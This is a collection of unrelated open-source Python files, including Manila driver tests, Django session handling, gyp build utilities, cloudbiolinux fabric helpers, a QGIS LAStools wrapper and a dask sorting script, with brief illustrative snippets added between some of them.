'_set_allow_hosts') self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=allowed_hosts)) self._helper.disable_access_for_maintenance( self.server_details, self.share_name) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, [], self.share_name) valid_cmd = ['echo', "'test test2'", '| sudo tee', maintenance_path] self._helper._ssh_exec.assert_called_once_with( self.server_details, valid_cmd) def test_restore_access_after_maintenance(self): fake_maintenance_path = "test.path" self.mock_object(self._helper, '_set_allow_hosts') self.mock_object(self._helper, '_get_maintenance_file_path', mock.Mock(return_value=fake_maintenance_path)) self.mock_object(self._helper, '_ssh_exec', mock.Mock(side_effect=[("fake fake2", 0), "fake"])) self._helper.restore_access_after_maintenance( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, ['fake', 'fake2'], self.share_name) self._helper._ssh_exec.assert_any_call( self.server_details, ['cat', fake_maintenance_path]) self._helper._ssh_exec.assert_any_call( self.server_details, ['sudo rm -f', fake_maintenance_path])
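The test file above leans on two idioms throughout: @ddt.data plus @ddt.unpack to parameterise a test method, and mock.Mock(side_effect=...) to script a sequence of return values and raised exceptions. The self-contained sketch below exercises the same pair of idioms against a made-up FakeDriver class (not a Manila class), assuming the third-party ddt and mock packages the tests import are installed; on Python 3, "from unittest import mock" works just as well.

# Illustrative only: the ddt + mock.Mock(side_effect=...) pattern from the
# tests above, applied to a hypothetical FakeDriver rather than Manila code.
import unittest

import ddt
import mock


class FakeDriver(object):
    def create_snapshot(self, member):
        raise NotImplementedError

    def create_all(self, members):
        # Mirrors the "create each member, stop on the first failure" flow.
        for member in members:
            self.create_snapshot(member)


@ddt.ddt
class FakeDriverTestCase(unittest.TestCase):

    @ddt.data({'side_effects': [None, ValueError], 'expected_calls': 2},
              {'side_effects': [ValueError], 'expected_calls': 1})
    @ddt.unpack
    def test_create_all_stops_on_first_error(self, side_effects,
                                             expected_calls):
        driver = FakeDriver()
        # Each item in side_effects scripts one call: a value is returned,
        # an exception class is raised.
        driver.create_snapshot = mock.Mock(side_effect=side_effects)

        self.assertRaises(ValueError, driver.create_all, ['a', 'b', 'c'])
        self.assertEqual(expected_calls, driver.create_snapshot.call_count)


if __name__ == '__main__':
    unittest.main()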
gangadhar-kadam/mtn-erpnext
refs/heads/master
website/doctype/top_bar_item/top_bar_item.py
483
# ERPNext - web based ERP (http://erpnext.com) # Copyright (C) 2012 Web Notes Technologies Pvt Ltd # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals import webnotes class DocType: def __init__(self, d, dl): self.doc, self.doclist = d, dl
Pluto-tv/chromium-crosswalk
refs/heads/master
tools/perf/core/project_config.py
2
# Copyright (c) 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import os import sys sys.path.append(os.path.join( os.path.dirname(__file__), os.pardir, os.pardir, 'telemetry')) from telemetry import benchmark_runner top_level_dir = os.path.dirname(os.path.realpath( os.path.join(__file__, os.pardir))) config = benchmark_runner.ProjectConfig( top_level_dir=top_level_dir, benchmark_dirs=[os.path.join(top_level_dir, 'benchmarks')]) config.telemetry_dir = os.path.realpath(os.path.join( top_level_dir, os.pardir, 'telemetry'))
GhostThrone/django
refs/heads/master
django/contrib/sessions/backends/base.py
298
from __future__ import unicode_literals import base64 import logging import string from datetime import datetime, timedelta from django.conf import settings from django.contrib.sessions.exceptions import SuspiciousSession from django.core.exceptions import SuspiciousOperation from django.utils import timezone from django.utils.crypto import ( constant_time_compare, get_random_string, salted_hmac, ) from django.utils.encoding import force_bytes, force_text from django.utils.module_loading import import_string # session_key should not be case sensitive because some backends can store it # on case insensitive file systems. VALID_KEY_CHARS = string.ascii_lowercase + string.digits class CreateError(Exception): """ Used internally as a consistent exception type to catch from save (see the docstring for SessionBase.save() for details). """ pass class SessionBase(object): """ Base class for all Session classes. """ TEST_COOKIE_NAME = 'testcookie' TEST_COOKIE_VALUE = 'worked' def __init__(self, session_key=None): self._session_key = session_key self.accessed = False self.modified = False self.serializer = import_string(settings.SESSION_SERIALIZER) def __contains__(self, key): return key in self._session def __getitem__(self, key): return self._session[key] def __setitem__(self, key, value): self._session[key] = value self.modified = True def __delitem__(self, key): del self._session[key] self.modified = True def get(self, key, default=None): return self._session.get(key, default) def pop(self, key, default=None): self.modified = self.modified or key in self._session return self._session.pop(key, default) def setdefault(self, key, value): if key in self._session: return self._session[key] else: self.modified = True self._session[key] = value return value def set_test_cookie(self): self[self.TEST_COOKIE_NAME] = self.TEST_COOKIE_VALUE def test_cookie_worked(self): return self.get(self.TEST_COOKIE_NAME) == self.TEST_COOKIE_VALUE def delete_test_cookie(self): del self[self.TEST_COOKIE_NAME] def _hash(self, value): key_salt = "django.contrib.sessions" + self.__class__.__name__ return salted_hmac(key_salt, value).hexdigest() def encode(self, session_dict): "Returns the given session dictionary serialized and encoded as a string." serialized = self.serializer().dumps(session_dict) hash = self._hash(serialized) return base64.b64encode(hash.encode() + b":" + serialized).decode('ascii') def decode(self, session_data): encoded_data = base64.b64decode(force_bytes(session_data)) try: # could produce ValueError if there is no ':' hash, serialized = encoded_data.split(b':', 1) expected_hash = self._hash(serialized) if not constant_time_compare(hash.decode(), expected_hash): raise SuspiciousSession("Session data corrupted") else: return self.serializer().loads(serialized) except Exception as e: # ValueError, SuspiciousOperation, unpickling exceptions. If any of # these happen, just return an empty dictionary (an empty session). 
if isinstance(e, SuspiciousOperation): logger = logging.getLogger('django.security.%s' % e.__class__.__name__) logger.warning(force_text(e)) return {} def update(self, dict_): self._session.update(dict_) self.modified = True def has_key(self, key): return key in self._session def keys(self): return self._session.keys() def values(self): return self._session.values() def items(self): return self._session.items() def iterkeys(self): return self._session.iterkeys() def itervalues(self): return self._session.itervalues() def iteritems(self): return self._session.iteritems() def clear(self): # To avoid unnecessary persistent storage accesses, we set up the # internals directly (loading data wastes time, since we are going to # set it to an empty dict anyway). self._session_cache = {} self.accessed = True self.modified = True def is_empty(self): "Returns True when there is no session_key and the session is empty" try: return not bool(self._session_key) and not self._session_cache except AttributeError: return True def _get_new_session_key(self): "Returns session key that isn't being used." while True: session_key = get_random_string(32, VALID_KEY_CHARS) if not self.exists(session_key): break return session_key def _get_or_create_session_key(self): if self._session_key is None: self._session_key = self._get_new_session_key() return self._session_key def _validate_session_key(self, key): """ Key must be truthy and at least 8 characters long. 8 characters is an arbitrary lower bound for some minimal key security. """ return key and len(key) >= 8 def _get_session_key(self): return self.__session_key def _set_session_key(self, value): """ Validate session key on assignment. Invalid values will set to None. """ if self._validate_session_key(value): self.__session_key = value else: self.__session_key = None session_key = property(_get_session_key) _session_key = property(_get_session_key, _set_session_key) def _get_session(self, no_load=False): """ Lazily loads session from storage (unless "no_load" is True, when only an empty dict is stored) and stores it in the current instance. """ self.accessed = True try: return self._session_cache except AttributeError: if self.session_key is None or no_load: self._session_cache = {} else: self._session_cache = self.load() return self._session_cache _session = property(_get_session) def get_expiry_age(self, **kwargs): """Get the number of seconds until the session expires. Optionally, this function accepts `modification` and `expiry` keyword arguments specifying the modification and expiry of the session. """ try: modification = kwargs['modification'] except KeyError: modification = timezone.now() # Make the difference between "expiry=None passed in kwargs" and # "expiry not passed in kwargs", in order to guarantee not to trigger # self.load() when expiry is provided. try: expiry = kwargs['expiry'] except KeyError: expiry = self.get('_session_expiry') if not expiry: # Checks both None and 0 cases return settings.SESSION_COOKIE_AGE if not isinstance(expiry, datetime): return expiry delta = expiry - modification return delta.days * 86400 + delta.seconds def get_expiry_date(self, **kwargs): """Get session the expiry date (as a datetime object). Optionally, this function accepts `modification` and `expiry` keyword arguments specifying the modification and expiry of the session. 
""" try: modification = kwargs['modification'] except KeyError: modification = timezone.now() # Same comment as in get_expiry_age try: expiry = kwargs['expiry'] except KeyError: expiry = self.get('_session_expiry') if isinstance(expiry, datetime): return expiry if not expiry: # Checks both None and 0 cases expiry = settings.SESSION_COOKIE_AGE return modification + timedelta(seconds=expiry) def set_expiry(self, value): """ Sets a custom expiration for the session. ``value`` can be an integer, a Python ``datetime`` or ``timedelta`` object or ``None``. If ``value`` is an integer, the session will expire after that many seconds of inactivity. If set to ``0`` then the session will expire on browser close. If ``value`` is a ``datetime`` or ``timedelta`` object, the session will expire at that specific future time. If ``value`` is ``None``, the session uses the global session expiry policy. """ if value is None: # Remove any custom expiration for this session. try: del self['_session_expiry'] except KeyError: pass return if isinstance(value, timedelta): value = timezone.now() + value self['_session_expiry'] = value def get_expire_at_browser_close(self): """ Returns ``True`` if the session is set to expire when the browser closes, and ``False`` if there's an expiry date. Use ``get_expiry_date()`` or ``get_expiry_age()`` to find the actual expiry date/age, if there is one. """ if self.get('_session_expiry') is None: return settings.SESSION_EXPIRE_AT_BROWSER_CLOSE return self.get('_session_expiry') == 0 def flush(self): """ Removes the current session data from the database and regenerates the key. """ self.clear() self.delete() self._session_key = None def cycle_key(self): """ Creates a new session key, whilst retaining the current session data. """ data = self._session_cache key = self.session_key self.create() self._session_cache = data self.delete(key) # Methods that child classes must implement. def exists(self, session_key): """ Returns True if the given session_key already exists. """ raise NotImplementedError('subclasses of SessionBase must provide an exists() method') def create(self): """ Creates a new session instance. Guaranteed to create a new object with a unique key and will have saved the result once (with empty data) before the method returns. """ raise NotImplementedError('subclasses of SessionBase must provide a create() method') def save(self, must_create=False): """ Saves the session data. If 'must_create' is True, a new session object is created (otherwise a CreateError exception is raised). Otherwise, save() can update an existing object with the same key. """ raise NotImplementedError('subclasses of SessionBase must provide a save() method') def delete(self, session_key=None): """ Deletes the session data under this key. If the key is None, the current session key value is used. """ raise NotImplementedError('subclasses of SessionBase must provide a delete() method') def load(self): """ Loads the session data and returns a dictionary. """ raise NotImplementedError('subclasses of SessionBase must provide a load() method') @classmethod def clear_expired(cls): """ Remove expired sessions from the session store. If this operation isn't possible on a given backend, it should raise NotImplementedError. If it isn't necessary, because the backend has a built-in expiration mechanism, it should be a no-op. """ raise NotImplementedError('This backend does not support clear_expired().')
jonkrohn/study-group
refs/heads/master
neural-networks-and-deep-learning/fig/misleading_gradient_contours.py
4
""" misleading_gradient_contours ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Plots the contours of the function from misleading_gradient.py""" #### Libraries # Third party libraries import matplotlib.pyplot as plt import numpy X = numpy.arange(-1, 1, 0.02) Y = numpy.arange(-1, 1, 0.02) X, Y = numpy.meshgrid(X, Y) Z = X**2 + 10*Y**2 plt.figure() CS = plt.contour(X, Y, Z, levels=[0.5, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0]) plt.xlabel("$w_1$", fontsize=16) plt.ylabel("$w_2$", fontsize=16) plt.show()
Gaia3D/QGIS
refs/heads/master
python/plugins/processing/algs/lidar/lastools/lasoverlap.py
9
# -*- coding: utf-8 -*- """ *************************************************************************** lasoverlap.py --------------------- Date : September 2013 Copyright : (C) 2013 by Martin Isenburg Email : martin near rapidlasso point com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Martin Isenburg' __date__ = 'September 2013' __copyright__ = '(C) 2013, Martin Isenburg' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' import os from LAStoolsUtils import LAStoolsUtils from LAStoolsAlgorithm import LAStoolsAlgorithm from processing.core.parameters import ParameterBoolean from processing.core.parameters import ParameterNumber from processing.core.parameters import ParameterSelection class lasoverlap(LAStoolsAlgorithm): CHECK_STEP = "CHECK_STEP" ATTRIBUTE = "ATTRIBUTE" OPERATION = "OPERATION" ATTRIBUTES = ["elevation", "intensity", "number_of_returns", "scan_angle_abs", "density"] OPERATIONS = ["lowest", "highest", "average"] CREATE_OVERLAP_RASTER = "CREATE_OVERLAP_RASTER" CREATE_DIFFERENCE_RASTER = "CREATE_DIFFERENCE_RASTER" def defineCharacteristics(self): self.name = "lasoverlap" self.group = "LAStools" self.addParametersVerboseGUI() self.addParametersPointInputGUI() self.addParametersFilter1ReturnClassFlagsGUI() self.addParameter(ParameterNumber(lasoverlap.CHECK_STEP, self.tr("size of grid used for overlap check"), 0, None, 2.0)) self.addParameter(ParameterSelection(lasoverlap.ATTRIBUTE, self.tr("attribute to check"), lasoverlap.ATTRIBUTES, 0)) self.addParameter(ParameterSelection(lasoverlap.OPERATION, self.tr("operation on attribute per cell"), lasoverlap.OPERATIONS, 0)) self.addParameter(ParameterBoolean(lasoverlap.CREATE_OVERLAP_RASTER, self.tr("create overlap raster"), True)) self.addParameter(ParameterBoolean(lasoverlap.CREATE_DIFFERENCE_RASTER, self.tr("create difference raster"), True)) self.addParametersRasterOutputGUI() self.addParametersAdditionalGUI() def processAlgorithm(self, progress): commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasoverlap")] self.addParametersVerboseCommands(commands) self.addParametersPointInputCommands(commands) self.addParametersFilter1ReturnClassFlagsCommands(commands) step = self.getParameterValue(lasoverlap.CHECK_STEP) if step != 0.0: commands.append("-step") commands.append(str(step)) commands.append("-values") attribute = self.getParameterValue(lasoverlap.ATTRIBUTE) if attribute != 0: commands.append("-" + lasoverlap.ATTRIBUTES[attribute]) operation = self.getParameterValue(lasoverlap.OPERATION) if operation != 0: commands.append("-" + lasoverlap.OPERATIONS[operation]) if not self.getParameterValue(lasoverlap.CREATE_OVERLAP_RASTER): commands.append("-no_over") if not self.getParameterValue(lasoverlap.CREATE_DIFFERENCE_RASTER): commands.append("-no_diff") self.addParametersRasterOutputCommands(commands) self.addParametersAdditionalCommands(commands) LAStoolsUtils.runLAStools(commands, progress)
kdaily/cloudbiolinux
refs/heads/master
cloudbio/utils.py
10
"""Utilities for logging and progress tracking. """ import logging import os import sys from fabric.main import load_settings from fabric.colors import yellow, red, green, magenta from fabric.api import settings, hide, cd, run from fabric.contrib.files import exists from cloudbio.distribution import _setup_distribution_environment from cloudbio.flavor import Flavor from cloudbio.flavor.config import get_config_file class ColorFormatter(logging.Formatter): """ Format log message based on the message level http://stackoverflow.com/questions/1343227/can-pythons-logging-format-be-modified-depending-on-the-message-log-level """ # Setup formatters for each of the levels err_fmt = red("ERR [%(filename)s(%(lineno)d)] %(msg)s") warn_fmt = magenta("WARN [%(filename)s(%(lineno)d)]: %(msg)s") dbg_fmt = yellow("DBG [%(filename)s]: %(msg)s") info_fmt = green("INFO: %(msg)s") def __init__(self, fmt="%(name)s %(levelname)s: %(msg)s"): logging.Formatter.__init__(self, fmt) def format(self, record): # Save the original format configured by the user # when the logger formatter was instantiated format_orig = self._fmt # Replace the original format with one customized by logging level if record.levelno == 10: # DEBUG self._fmt = ColorFormatter.dbg_fmt elif record.levelno == 20: # INFO self._fmt = ColorFormatter.info_fmt elif record.levelno == 30: # WARN self._fmt = ColorFormatter.warn_fmt elif record.levelno == 40: # ERROR self._fmt = ColorFormatter.err_fmt # Call the original formatter class to do the grunt work result = logging.Formatter.format(self, record) # Restore the original format configured by the user self._fmt = format_orig return result def _setup_logging(env): env.logger = logging.getLogger("cloudbiolinux") env.logger.setLevel(logging.DEBUG) ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) # Use custom formatter ch.setFormatter(ColorFormatter()) env.logger.addHandler(ch) def _update_biolinux_log(env, target, flavor): """Updates the VM so it contains information on the latest BioLinux update in /var/log/biolinux.log. The latest information is appended to the file and can be used to see if an installation/update has completed (see also ./test/test_vagrant). """ if not target: target = env.get("target", None) if not target: target = "unknown" else: target = target.name if not flavor: flavor = env.get("flavor", None) if not flavor: flavor = "unknown" else: flavor = flavor.name logfn = "/var/log/biolinux.log" info = "Target="+target+"; Flavor="+flavor env.logger.info(info) if env.use_sudo: env.safe_sudo("date +\"%D %T - Updated "+info+"\" >> "+logfn) def _configure_fabric_environment(env, flavor=None, fabricrc_loader=None, ignore_distcheck=False): if not fabricrc_loader: fabricrc_loader = _parse_fabricrc _setup_flavor(env, flavor) fabricrc_loader(env) # get parameters for distro, packages etc. _setup_distribution_environment(ignore_distcheck=ignore_distcheck) _create_local_paths(env) def _setup_flavor(env, flavor): """Setup a flavor, providing customization hooks to modify CloudBioLinux installs. Specify flavor as a name, in which case we look it up in the standard flavor directory (contrib/flavor/your_flavor), or as an absolute path to a flavor directory outside of cloudbiolinux. 
""" env.flavor = Flavor(env) env.flavor_dir = None if flavor: # set the directory for flavor customizations if os.path.isabs(flavor) or os.path.exists(flavor): flavor_dir = flavor else: flavor_dir = os.path.join(os.path.dirname(__file__), '..', 'contrib', 'flavor', flavor) assert os.path.exists(flavor_dir), \ "Did not find directory {0} for flavor {1}".format(flavor_dir, flavor) env.flavor_dir = flavor_dir flavor_name = os.path.split(flavor_dir)[-1] # Reinstantiate class if custom defined import cloudbio.flavor try: env.flavor = getattr(cloudbio.flavor, flavor_name.capitalize())(env) except AttributeError: pass env.flavor.name = flavor_name # Load python customizations to base configuration if present for ext in ["", "flavor"]: py_flavor = os.path.split(os.path.realpath(flavor_dir))[1] + ext flavor_custom_py = os.path.join(flavor_dir, "{0}.py".format(py_flavor)) if os.path.exists(flavor_custom_py): sys.path.append(flavor_dir) mod = __import__(py_flavor, fromlist=[py_flavor]) env.logger.info(env.flavor) env.logger.info("This is a %s flavor" % env.flavor.name) def _parse_fabricrc(env): """Defaults from fabricrc.txt file; loaded if not specified at commandline. """ env.config_dir = os.path.join(os.path.dirname(__file__), "..", "config") env.tool_data_table_conf_file = os.path.join(env.config_dir, "..", "installed_files", "tool_data_table_conf.xml") if not env.has_key("distribution") and not env.has_key("system_install"): env.logger.info("Reading default fabricrc.txt") env.update(load_settings(get_config_file(env, "fabricrc.txt").base)) if "shell_config" not in env: env.shell_config = "~/.bashrc" if "shell" not in env: env.shell = "/bin/bash -i -c" def _create_local_paths(env): """Expand any paths defined in terms of shell shortcuts (like ~). """ with settings(hide('warnings', 'running', 'stdout', 'stderr'), warn_only=True): # This is the first point we call into a remote host - make sure # it does not fail silently by calling a dummy run env.logger.info("Now, testing connection to host...") test = env.safe_run("pwd") # If there is a connection failure, the rest of the code is (sometimes) not # reached - for example with Vagrant the program just stops after above run # command. if test != None: env.logger.info("Connection to host appears to work!") else: raise NotImplementedError("Connection to host failed") env.logger.debug("Expand paths") if "local_install" in env: if not env.safe_exists(env.local_install): env.safe_sudo("mkdir -p %s" % env.local_install) user = env.safe_run_output("echo $USER") env.safe_sudo("chown -R %s %s" % (user, env.local_install)) with cd(env.local_install): result = env.safe_run_output("pwd") env.local_install = result
ionelmc/django-admin-customizer
refs/heads/master
tests/test_app/models.py
1
from django import VERSION from admin_customizer.fields import OrderPreservingManyToManyField from django.db import models class Author(models.Model): name = models.CharField(max_length=100) class Book(models.Model): name = models.CharField(max_length=100) created = models.DateTimeField(auto_now_add=True) authors = OrderPreservingManyToManyField(Author) class BookNote(models.Model): book = models.ForeignKey("Book", null=True) notes = models.TextField()
klim-iv/phantomjs-qt5
refs/heads/qt5
src/breakpad/src/tools/gyp/pylib/gyp/common.py
137
#!/usr/bin/python # Copyright (c) 2009 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import errno import filecmp import os.path import re import tempfile import sys def ExceptionAppend(e, msg): """Append a message to the given exception's message.""" if not e.args: e.args = (msg,) elif len(e.args) == 1: e.args = (str(e.args[0]) + ' ' + msg,) else: e.args = (str(e.args[0]) + ' ' + msg,) + e.args[1:] def ParseQualifiedTarget(target): # Splits a qualified target into a build file, target name and toolset. # NOTE: rsplit is used to disambiguate the Windows drive letter separator. target_split = target.rsplit(':', 1) if len(target_split) == 2: [build_file, target] = target_split else: build_file = None target_split = target.rsplit('#', 1) if len(target_split) == 2: [target, toolset] = target_split else: toolset = None return [build_file, target, toolset] def ResolveTarget(build_file, target, toolset): # This function resolves a target into a canonical form: # - a fully defined build file, either absolute or relative to the current # directory # - a target name # - a toolset # # build_file is the file relative to which 'target' is defined. # target is the qualified target. # toolset is the default toolset for that target. [parsed_build_file, target, parsed_toolset] = ParseQualifiedTarget(target) if parsed_build_file: if build_file: # If a relative path, parsed_build_file is relative to the directory # containing build_file. If build_file is not in the current directory, # parsed_build_file is not a usable path as-is. Resolve it by # interpreting it as relative to build_file. If parsed_build_file is # absolute, it is usable as a path regardless of the current directory, # and os.path.join will return it as-is. build_file = os.path.normpath(os.path.join(os.path.dirname(build_file), parsed_build_file)) else: build_file = parsed_build_file if parsed_toolset: toolset = parsed_toolset return [build_file, target, toolset] def BuildFile(fully_qualified_target): # Extracts the build file from the fully qualified target. return ParseQualifiedTarget(fully_qualified_target)[0] def QualifiedTarget(build_file, target, toolset): # "Qualified" means the file that a target was defined in and the target # name, separated by a colon, suffixed by a # and the toolset name: # /path/to/file.gyp:target_name#toolset fully_qualified = build_file + ':' + target if toolset: fully_qualified = fully_qualified + '#' + toolset return fully_qualified def RelativePath(path, relative_to): # Assuming both |path| and |relative_to| are relative to the current # directory, returns a relative path that identifies path relative to # relative_to. # Convert to absolute (and therefore normalized paths). path = os.path.abspath(path) relative_to = os.path.abspath(relative_to) # Split the paths into components. path_split = path.split(os.path.sep) relative_to_split = relative_to.split(os.path.sep) # Determine how much of the prefix the two paths share. prefix_len = len(os.path.commonprefix([path_split, relative_to_split])) # Put enough ".." components to back up out of relative_to to the common # prefix, and then append the part of path_split after the common prefix. relative_split = [os.path.pardir] * (len(relative_to_split) - prefix_len) + \ path_split[prefix_len:] if len(relative_split) == 0: # The paths were the same. return '' # Turn it back into a string and we're done. 
return os.path.join(*relative_split) def FixIfRelativePath(path, relative_to): # Like RelativePath but returns |path| unchanged if it is absolute. if os.path.isabs(path): return path return RelativePath(path, relative_to) def UnrelativePath(path, relative_to): # Assuming that |relative_to| is relative to the current directory, and |path| # is a path relative to the dirname of |relative_to|, returns a path that # identifies |path| relative to the current directory. rel_dir = os.path.dirname(relative_to) return os.path.normpath(os.path.join(rel_dir, path)) # re objects used by EncodePOSIXShellArgument. See IEEE 1003.1 XCU.2.2 at # http://www.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_02 # and the documentation for various shells. # _quote is a pattern that should match any argument that needs to be quoted # with double-quotes by EncodePOSIXShellArgument. It matches the following # characters appearing anywhere in an argument: # \t, \n, space parameter separators # # comments # $ expansions (quoted to always expand within one argument) # % called out by IEEE 1003.1 XCU.2.2 # & job control # ' quoting # (, ) subshell execution # *, ?, [ pathname expansion # ; command delimiter # <, >, | redirection # = assignment # {, } brace expansion (bash) # ~ tilde expansion # It also matches the empty string, because "" (or '') is the only way to # represent an empty string literal argument to a POSIX shell. # # This does not match the characters in _escape, because those need to be # backslash-escaped regardless of whether they appear in a double-quoted # string. _quote = re.compile('[\t\n #$%&\'()*;<=>?[{|}~]|^$') # _escape is a pattern that should match any character that needs to be # escaped with a backslash, whether or not the argument matched the _quote # pattern. _escape is used with re.sub to backslash anything in _escape's # first match group, hence the (parentheses) in the regular expression. # # _escape matches the following characters appearing anywhere in an argument: # " to prevent POSIX shells from interpreting this character for quoting # \ to prevent POSIX shells from interpreting this character for escaping # ` to prevent POSIX shells from interpreting this character for command # substitution # Missing from this list is $, because the desired behavior of # EncodePOSIXShellArgument is to permit parameter (variable) expansion. # # Also missing from this list is !, which bash will interpret as the history # expansion character when history is enabled. bash does not enable history # by default in non-interactive shells, so this is not thought to be a problem. # ! was omitted from this list because bash interprets "\!" as a literal string # including the backslash character (avoiding history expansion but retaining # the backslash), which would not be correct for argument encoding. Handling # this case properly would also be problematic because bash allows the history # character to be changed with the histchars shell variable. Fortunately, # as history is not enabled in non-interactive shells and # EncodePOSIXShellArgument is only expected to encode for non-interactive # shells, there is no room for error here by ignoring !. _escape = re.compile(r'(["\\`])') def EncodePOSIXShellArgument(argument): """Encodes |argument| suitably for consumption by POSIX shells. argument may be quoted and escaped as necessary to ensure that POSIX shells treat the returned value as a literal representing the argument passed to this function. 
Parameter (variable) expansions beginning with $ are allowed to remain intact without escaping the $, to allow the argument to contain references to variables to be expanded by the shell. """ if not isinstance(argument, str): argument = str(argument) if _quote.search(argument): quote = '"' else: quote = '' encoded = quote + re.sub(_escape, r'\\\1', argument) + quote return encoded def EncodePOSIXShellList(list): """Encodes |list| suitably for consumption by POSIX shells. Returns EncodePOSIXShellArgument for each item in list, and joins them together using the space character as an argument separator. """ encoded_arguments = [] for argument in list: encoded_arguments.append(EncodePOSIXShellArgument(argument)) return ' '.join(encoded_arguments) def DeepDependencyTargets(target_dicts, roots): """Returns the recursive list of target dependencies. """ dependencies = set() for r in roots: spec = target_dicts[r] r_deps = list(set((spec.get('dependencies', []) + spec.get('dependencies_original', [])))) for d in r_deps: if d not in roots: dependencies.add(d) for d in DeepDependencyTargets(target_dicts, r_deps): if d not in roots: dependencies.add(d) return list(dependencies) def BuildFileTargets(target_list, build_file): """From a target_list, returns the subset from the specified build_file. """ return [p for p in target_list if BuildFile(p) == build_file] def AllTargets(target_list, target_dicts, build_file): """Returns all targets (direct and dependencies) for the specified build_file. """ bftargets = BuildFileTargets(target_list, build_file) deptargets = DeepDependencyTargets(target_dicts, bftargets) return bftargets + deptargets def WriteOnDiff(filename): """Write to a file only if the new contents differ. Arguments: filename: name of the file to potentially write to. Returns: A file like object which will write to temporary file and only overwrite the target if it differs (on close). """ class Writer: """Wrapper around file which only covers the target if it differs.""" def __init__(self): # Pick temporary file. tmp_fd, self.tmp_path = tempfile.mkstemp( suffix='.tmp', prefix=os.path.split(filename)[1] + '.gyp.', dir=os.path.split(filename)[0]) try: self.tmp_file = os.fdopen(tmp_fd, 'wb') except Exception: # Don't leave turds behind. os.unlink(self.tmp_path) raise def __getattr__(self, attrname): # Delegate everything else to self.tmp_file return getattr(self.tmp_file, attrname) def close(self): try: # Close tmp file. self.tmp_file.close() # Determine if different. same = False try: same = filecmp.cmp(self.tmp_path, filename, False) except OSError, e: if e.errno != errno.ENOENT: raise if same: # The new file is identical to the old one, just get rid of the new # one. os.unlink(self.tmp_path) else: # The new file is different from the old one, or there is no old one. # Rename the new file to the permanent name. # # tempfile.mkstemp uses an overly restrictive mode, resulting in a # file that can only be read by the owner, regardless of the umask. # There's no reason to not respect the umask here, which means that # an extra hoop is required to fetch it and reset the new file's mode. # # No way to get the umask without setting a new one? Set a safe one # and then set it back to the old value. umask = os.umask(077) os.umask(umask) os.chmod(self.tmp_path, 0666 & ~umask) if sys.platform == 'win32' and os.path.exists(filename): # NOTE: on windows (but not cygwin) rename will not replace an # existing file, so it must be preceded with a remove. Sadly there # is no way to make the switch atomic. 
os.remove(filename) os.rename(self.tmp_path, filename) except Exception: # Don't leave turds behind. os.unlink(self.tmp_path) raise return Writer() # From Alex Martelli, # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52560 # ASPN: Python Cookbook: Remove duplicates from a sequence # First comment, dated 2001/10/13. # (Also in the printed Python Cookbook.) def uniquer(seq, idfun=None): if idfun is None: def idfun(x): return x seen = {} result = [] for item in seq: marker = idfun(item) if marker in seen: continue seen[marker] = 1 result.append(item) return result
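To see what the _quote/_escape rules above actually produce, the snippet below copies the two regular expressions and condenses EncodePOSIXShellArgument / EncodePOSIXShellList into Python-3-friendly helpers, then asserts a few representative encodings. The helper names are local to this sketch; the behaviour is intended to mirror the functions shown above, not to replace them.

# Quick, self-contained check of the POSIX shell quoting rules above.
# The regexes are copied from this file; the helpers are sketch-local names.
import re

_quote = re.compile('[\t\n #$%&\'()*;<=>?[{|}~]|^$')
_escape = re.compile(r'(["\\`])')


def encode_posix_shell_argument(argument):
    argument = str(argument)
    quote = '"' if _quote.search(argument) else ''
    return quote + _escape.sub(r'\\\1', argument) + quote


def encode_posix_shell_list(arguments):
    return ' '.join(encode_posix_shell_argument(a) for a in arguments)


assert encode_posix_shell_argument('main.c') == 'main.c'
assert encode_posix_shell_argument('two words') == '"two words"'
assert encode_posix_shell_argument('$OUT/app') == '"$OUT/app"'      # $ left for expansion
assert encode_posix_shell_argument('say "hi"') == '"say \\"hi\\""'  # quotes backslash-escaped
assert encode_posix_shell_argument('') == '""'                      # empty arg must stay an arg
assert encode_posix_shell_list(['gcc', '-o', 'my app', 'main.c']) == 'gcc -o "my app" main.c'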
MartinThoma/algorithms
refs/heads/master
sorting/dask-sort.py
1
import dask import dask.dataframe as dd input_file = "numbers-large.txt" output_file = "numbers-large-sorted-dask.txt" blocksize = 1_000_000 print("Create ddf") ddf = dd.read_csv(input_file, header=None, blocksize=blocksize) print("Sort") ddf_sorted = ddf.set_index(0) print("Write") fut = ddf_sorted.to_csv(output_file, compute=False, single_file=True, header=None) dask.compute(fut) print("Stop")
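The script above assumes numbers-large.txt already exists, and its format is never shown; the generator below guesses the simplest layout compatible with read_csv(..., header=None) followed by set_index(0): one integer per line, no header. Row count and value range are arbitrary, so adjust both before timing the sort.

# Hypothetical input generator for the sort script above; the file name comes
# from that script, everything else (row count, value range) is a guess.
import random

with open("numbers-large.txt", "w") as handle:
    for _ in range(1_000_000):
        handle.write("%d\n" % random.randint(0, 10_000_000))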
googleinterns/power-data-graphing-intern-2020
refs/heads/master
backend/level_slice_test.py
1
